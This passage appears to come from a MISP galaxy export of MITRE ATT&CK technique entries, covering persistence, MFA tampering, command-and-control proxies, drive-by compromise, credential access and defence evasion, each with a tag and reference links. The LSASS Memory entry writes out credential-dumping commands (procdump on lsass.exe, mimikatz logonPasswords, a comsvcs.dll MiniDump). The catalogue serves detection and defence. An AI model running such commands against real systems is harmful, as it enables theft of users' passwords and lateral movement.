Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007"

Table 5969. Table References

Links

https://attack.mitre.org/techniques/T1547/007

https://support.apple.com/en-us/HT204005

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Multi-Factor Authentication - T1556.006

Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions)

For example, modifying the Windows hosts file (C:\windows\system32\drivers\etc\hosts) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022)

Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim’s network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication - T1556.006"

Table 5970. Table References

Links

https://attack.mitre.org/techniques/T1556/006

https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

https://www.mandiant.com/media/17826

Obtain/re-use payloads - T1346

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).

A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346"

Table 5971. Table References

Links

https://attack.mitre.org/techniques/T1346

Multi-Stage Channels - T1104

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104"

Table 5972. Table References

Links

https://attack.mitre.org/techniques/T1104

DLL Side-Loading - T1073

Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)

Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073"

Table 5973. Table References

Links

https://attack.mitre.org/techniques/T1073

https://capec.mitre.org/data/definitions/641.html

https://msdn.microsoft.com/en-us/library/aa375365

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

Command-Line Interface - T1605

Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s Runtime package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605"

Table 5974. Table References

Links

https://attack.mitre.org/techniques/T1605

Non-Standard Port - T1509

Adversaries may generate network traffic using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1509"

Table 5975. Table References

Links

https://attack.mitre.org/techniques/T1509

Re-opened Applications - T1164

Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>.

An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).

The tag is: misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164"

Table 5976. Table References

Links

https://attack.mitre.org/techniques/T1164

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Non-Standard Port - T1571

Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.

Adversaries may also make changes to victim systems to abuse non-standard ports. For example, Registry keys and other configuration settings can be used to modify protocol and port pairings.(Citation: change_rdp_port_conti)

The tag is: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571"

Table 5977. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1571

https://twitter.com/TheDFIRReport/status/1498657772254240768

https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

SID-History Injection - T1178

The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).

The tag is: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178"

Table 5978. Table References

Links

https://adsecurity.org/?p=1772

https://attack.mitre.org/techniques/T1178

https://msdn.microsoft.com/library/ms677982.aspx

https://msdn.microsoft.com/library/ms679833.aspx

https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx

https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems

https://technet.microsoft.com/library/ee617241.aspx

Multi-hop Proxy - T1188

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.

The tag is: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1188"

Table 5979. Table References

Links

https://attack.mitre.org/techniques/T1188

Drive-by Compromise - T1189

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting

  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary

  • Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189"

Table 5980. Table References

Links

http://blog.shadowserver.org/2012/05/15/cyber-espionage-strategic-web-compromises-trusted-websites-serving-dangerous-results/

https://attack.mitre.org/techniques/T1189

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

Pre-OS Boot - T1542

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Pre-OS Boot - T1542"

Table 5981. Table References

Links

https://attack.mitre.org/techniques/T1542

https://en.wikipedia.org/wiki/Booting

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Drive-By Compromise - T1456

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist, including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.

  • Malicious ads are paid for and served through legitimate ad providers.

  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Lookout-StealthMango)

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.

  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.

    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.

  3. Upon finding a vulnerable version, exploit code is delivered to the browser.

  4. If exploitation is successful, then it will give the adversary code execution on the user’s system unless other protections are in place.

    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

The tag is: misp-galaxy:mitre-attack-pattern="Drive-By Compromise - T1456"

Table 5982. Table References

Links

https://attack.mitre.org/techniques/T1456

https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html

Inter-Process Communication - T1559

Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.

Adversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) or [Component Object Model](https://attack.mitre.org/techniques/T1559/001). Linux environments support several different IPC mechanisms, two of which being sockets and pipes.(Citation: Linux IPC) Higher level execution mediums, such as those of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s, may also leverage underlying IPC mechanisms. Adversaries may also use [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Inter-Process Communication - T1559"

Table 5983. Table References

Links

https://attack.mitre.org/techniques/T1559

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

https://www.geeksforgeeks.org/inter-process-communication-ipc/::text=Inter%2Dprocess%20communication%20(IPC)

Token Impersonation/Theft - T1134.001

Adversaries may duplicate then impersonate another user’s existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using DuplicateToken or DuplicateTokenEx. The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user’s security context, or with SetThreadToken to assign the impersonated token to a thread.

An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.

When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using CreateProcessWithTokenW or CreateProcessAsUserW. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.

The tag is: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"

Table 5984. Table References

Links

https://attack.mitre.org/techniques/T1134/001

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

DNS/Passive DNS - T1596.001

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="DNS/Passive DNS - T1596.001"

Table 5985. Table References

Links

https://attack.mitre.org/techniques/T1596/001

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

Junk Data - T1001.001

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

The tag is: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"

Table 5986. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/001

Traffic Duplication - T1020.001

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)

Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Duplication - T1020.001"

Table 5987. Table References

Links

https://attack.mitre.org/techniques/T1020/001

https://cloud.google.com/vpc/docs/packet-mirroring

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html

https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

LSASS Memory - T1003.001

Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).

As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.

For example, on the target host use procdump:

  • <code>procdump -ma lsass.exe lsass_dump</code>

Locally, mimikatz can be run using:

  • <code>sekurlsa::Minidump lsassdump.dmp</code>

  • <code>sekurlsa::logonPasswords</code>

Built-in Windows tools such as comsvcs.dll can also be used:

  • <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)

Windows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The following SSPs can be used to access credentials:

  • Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.

  • Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)

  • Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.

  • CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"

Table 5988. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1003/001

https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/

https://github.com/mattifestation/PowerSploit

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Protocol Impersonation - T1001.003

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003"

Table 5989. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/003

Internal Proxy - T1090.001

Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.

By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.

The tag is: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001"

Table 5990. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090/001

External Proxy - T1090.002

Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.

External connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.

The tag is: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002"

Table 5991. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1090/002

LSA Secrets - T1003.004

Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)

[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)

The tag is: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"

Table 5992. Table References

Links

https://attack.mitre.org/techniques/T1003/004

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN

https://github.com/mattifestation/PowerSploit

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets

https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf

https://www.passcape.com/index.php?section=docsys&cmd=details&id=23

Proc Filesystem - T1003.007

Adversaries may gather credentials from the proc filesystem or /proc. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the /proc/<PID>/maps file shows how memory is mapped within the process’s virtual address space. And /proc/<PID>/mem, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)

When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)

If running as or with the permissions of a web browser, a process can search the /maps & /mem locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.

The tag is: misp-galaxy:mitre-attack-pattern="Proc Filesystem - T1003.007"

Table 5993. Table References

Links

https://attack.mitre.org/techniques/T1003/007

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#proc-usdpid-maps-and-proc-usdpid-mem

https://github.com/huntergregal/mimipenguin

https://www.baeldung.com/linux/proc-id-maps

https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use

File Deletion - T1070.004

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include <code>del</code> on Windows and <code>rm</code> or <code>unlink</code> on Linux and macOS.

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"

Table 5994. Table References

Links

https://attack.mitre.org/techniques/T1070/004

https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete

Domain Fronting - T1090.004

Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004"

Table 5995. Table References

Links

http://www.icir.org/vern/papers/meek-PETS-2015.pdf

https://attack.mitre.org/techniques/T1090/004

Clear Persistence - T1070.009

Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)

In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Persistence - T1070.009"

Table 5996. Table References

Links

https://attack.mitre.org/techniques/T1070/009

https://blog.talosintelligence.com/recent-cyber-attack/

https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/

https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf

Password Guessing - T1110.001

Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target’s policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization’s login failure policies. (Citation: Cylance Cleaver)

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

  • SSH (22/TCP)

  • Telnet (23/TCP)

  • FTP (21/TCP)

  • NetBIOS / SMB / Samba (139/TCP & 445/TCP)

  • LDAP (389/TCP)

  • Kerberos (88/TCP)

  • RDP / Terminal Services (3389/TCP)

  • HTTP/HTTP Management Services (80/TCP & 443/TCP)

